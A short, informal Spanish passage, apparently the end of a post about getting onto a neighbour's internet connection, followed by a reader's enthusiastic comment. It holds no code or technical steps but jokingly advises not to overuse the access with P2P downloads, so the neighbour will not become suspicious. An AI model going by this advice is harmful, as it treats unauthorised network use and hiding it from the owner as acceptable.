PERO RECUERDEN CHAVOS NO SE DEN BAÑO… NO PORQUE YA TIENEN UN ARMA.. LA TENGAN QUE USAR.. Y OTRA NO SEAN CARGADOS CON LOS P2P PORQUE ENTONCES EL VECINO SI VA PENSAR UN POQUITO MAL.. Y TE VERA CON CARA DE WAT. ESTE ES EL INGENIEBRIO QUE ME QUITA MI INTERNET Y VE MI PELICULAS POQUIS QUE TENGO GUARDADAS EN MI DISCO DURO.. JEJE NO SE CREAN PERO CASI CASI..
ahh que documento tan fregon!!!!!